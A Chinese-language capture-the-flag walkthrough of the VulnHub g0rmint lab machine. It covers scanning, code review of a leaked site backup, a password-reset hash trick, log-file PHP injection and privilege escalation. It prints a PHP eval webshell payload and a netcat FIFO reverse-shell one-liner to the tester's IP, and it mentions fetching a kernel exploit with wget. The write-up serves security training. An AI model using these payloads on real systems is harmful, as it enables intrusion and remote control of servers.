kali滲透綜合靶機(十四)--g0rmint靶機
kali滲透綜合靶機(十四)--g0rmint靶機
靶機下載地址:https://www.vulnhub.com/entry/g0rmint-1,214/
一、主機發現
1.netdiscover -i eth0 -r 192.168.10.0/24
二、埠掃描
1. masscan --rate=10000 -p0-65535 192.168.10.173
三、埠服務識別
nmap -sV -T4 -O -p 22,80 192.168.10.173
四、漏洞查詢與利用
1.dirb目錄掃描
2.發現http://192.168.10.173/robots.txt,瀏覽器訪問,發現g0rmint
3.瀏覽器訪問http://192.168.10.173/g0rmint
4.檢視頁面原始碼,發現備份目錄
5.使用dirb 掃描http://192.168.10.173/g0rmint/s3cretbackupdirect0ry/,發現http://192.168.10.173/g0rmint/s3cretbackupdirect0ry/info.php
6.訪問http://192.168.10.173/g0rmint/s3cretbackupdirect0ry/info.php
7.下載備份檔案
8.檢視網站程式碼,發現使用者名稱、密碼、郵箱,嘗試登入失敗
線上解密
9.檢視login.php,發現登入失敗的時候會生成一個日誌檔案(呼叫addlog函式)
10.檢視addlog函式,發現日誌寫在.php檔案中,嘗試在登入郵箱處插入php語句,從而任意執行程式碼
11.在登入郵箱處插入php一句話木馬,點選提交,登入失敗跳轉到登入頁面
最後發現是fwrite($fh, file_get_contents("dummy.php") . "<br>\n");寫入了一個session判斷
所以需要先解決登入的問題。
12.檢視reset.php,可以看到只要知道了一個存在的郵箱和使用者名稱,就可以重置密碼為一個時間值的雜湊,嘗試了demo和一些常用郵箱使用者名稱之後,發現似乎並沒有這個使用者
13.在全文搜尋email關鍵字, 可以在一個css檔案中看到使用者的名字和郵箱
14.成功重置後,介面右下角也給出了對應的時間,遂能算出相應的雜湊值,使用線上的hash加密,去加密成功後的hash值前20位最為密碼的值
15. 用郵箱和算出的雜湊值就能登入到後臺中,然後就能成功的訪問到生成的log檔案
16.在登入的時郵箱處插入一條php語句,寫入webshell,<?php @eval($_POST[cmd]);?>然後訪問對應的日誌,提交post引數即可執行任意php程式碼。
17.然後將shell反彈到我的kali中來
在post中輸入:注意需要url編碼
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.168 1234 >/tmp/f;`;
18.在Kali開啟監聽,獲得shell
19.提權
19.1檢視核心版本
19.2kali檢視是否有對應版本的漏洞
19.3在kali編譯好指令碼,然後目標用wget下載,執行,獲得管理員許可權
提權方式二:
1.在/var/www目錄下又發現網站備份檔案,解壓發現db.sql,
2.發現使用者noman以及密碼
線上解密
3.嘗試用noman使用者登入,失敗,發現/etc/passwd中有g0rmint,嘗試用noman的密碼登入,成功登入進去
4.用sudo -l 檢視當前使用者是否屬於sudo組,然後sudo -i 直接獲得管理員許可權
總結:
1、資訊收集、埠掃描、服務識別
2、目錄掃描、發現敏感資訊備份檔案
3、登入密碼的地方暫時突破不了,嘗試在重置密碼的地方尋找突破口、發現有用資訊
4、進行程式碼審計,發現日誌檔案的字尾是php檔案,這時可以嘗試在登入的地方接入一句話,然後就寫入到日誌中。
5、getshell、提權